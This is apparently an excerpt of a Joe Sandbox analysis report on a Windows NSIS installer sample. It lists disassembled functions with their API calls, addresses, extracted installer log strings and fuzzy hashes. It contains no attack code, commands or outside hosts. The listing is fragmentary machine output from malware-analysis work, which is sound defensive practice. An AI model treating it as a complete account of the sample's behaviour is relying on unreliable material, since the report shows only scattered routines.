• Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
• Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
• Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
APIs
  • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
  • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
  • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
  • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
• CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
Memory Dump Source
• Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
Similarity
• API ID: Char$Next$CreateDirectoryPrev
• String ID:
• API String ID: 4115351271-0
• Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
• Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
• Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
• Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
APIs
• SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
Memory Dump Source
• Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
• Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
• Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
• Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E
APIs
• SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
Memory Dump Source
• Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
• Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
• Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
• Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
APIs
• SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
Memory Dump Source
• Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
• Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
• Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
• Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08
APIs
• KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
Memory Dump Source
• Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
• Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
• Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
• Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
• Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08
APIs
• GetDlgItem.USER32(?,000003F9), ref: 00404993
• GetDlgItem.USER32(?,00000408), ref: 004049A0
• GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
• LoadBitmapW.USER32(0000006E), ref: 00404A02
• SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
• ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
• SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
• SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
• SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
• DeleteObject.GDI32(?), ref: 00404A79
• SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
• SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
• SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
• SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
• SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
• GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
• ShowWindow.USER32(?,00000005), ref: 00404BCF
• SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
• SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
• SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
• SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
• SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
• ImageList_Destroy.COMCTL32(?), ref: 00404D9C
• GlobalFree.KERNEL32(?), ref: 00404DAC
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
• SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
• SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
• InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
• ShowWindow.USER32(?,00000000), ref: 00404F49
• GetDlgItem.USER32(?,000003FE), ref: 00404F54
• ShowWindow.USER32(00000000), ref: 00404F5B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                          • String ID: $ @$M$N
                                                                                                          • API String ID: 1638840714-3479655940
                                                                                                          • Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                                                                          • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                                                                                          • Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                                                                          • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                                                                          • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                                                                          • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                                                                          • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                                                                          • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00404583
                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                                                                          • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                                                                                          • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                                                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                                                                            • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                                                                            • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                            • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                            • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                            • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                            • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                                                                                          • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                                                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                          • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                          • String ID: 82D$@%F$@rD$A
                                                                                                          • API String ID: 3347642858-1086125096
                                                                                                          • Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                                                                          • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                                                                          • Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                                                                          • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                                                                          APIs
                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                                          • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                                                                          • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                                                                          • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                                                                          • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                                                                          • CloseHandle.KERNEL32(?), ref: 004071E6
                                                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                          • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                          • API String ID: 1916479912-1189179171
                                                                                                          • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                                                          • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                                                                          • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                                                          • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                                                                          APIs
                                                                                                          • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                                                                          • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                                                                                          • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                                                                                          • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                                                                          • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                                                                          • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                                                                          • FindClose.KERNEL32(?), ref: 00406E33
                                                                                                          Strings
                                                                                                          • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                                                                          • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                                                                          • \*.*, xrefs: 00406D03
                                                                                                          • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                                                                          • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                                                                          • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                                                                          • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                                                                          • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                          • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                                                                          • API String ID: 2035342205-3294556389
                                                                                                          • Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                                                          • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                                                                                          • Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                                                          • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                                                                                          APIs
                                                                                                          • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                          • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                                                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                          • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                                                                          • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                                                                          • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                          • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                          • API String ID: 3581403547-784952888
                                                                                                          • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                                                          • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                                                                          • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                                                          • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                                                                                          APIs
                                                                                                          • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                                                                          Strings
                                                                                                          • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
Similarity
• API ID: CreateInstance
• String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
• API String ID: 542301482-1377821865
• Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
• Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
• Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
• Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
APIs
• FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
Memory Dump Source
• Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: FileFindFirst
• String ID:
• API String ID: 1974802433-0
• Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
• Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
• Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
• Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
APIs
• GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
• lstrlenW.KERNEL32(?), ref: 004063CC
• GetVersionExW.KERNEL32(?), ref: 0040642A
  • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
• LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
• GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
• GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
• GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
• FreeLibrary.KERNEL32(00000000), ref: 004064D4
• GlobalFree.KERNEL32(?), ref: 004064DD
Strings
Memory Dump Source
• Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
• String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
• API String ID: 20674999-2124804629
• Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
• Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
• Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
• Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
APIs
• CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
• GetDlgItem.USER32(?,000003E8), ref: 00404181
• SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
• GetSysColor.USER32(?), ref: 004041AF
• SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
• SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
• lstrlenW.KERNEL32(?), ref: 004041D6
• SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
• SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
  • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
  • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
  • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
• GetDlgItem.USER32(?,0000040A), ref: 0040424A
• SendMessageW.USER32(00000000), ref: 00404251
• GetDlgItem.USER32(?,000003E8), ref: 0040427E
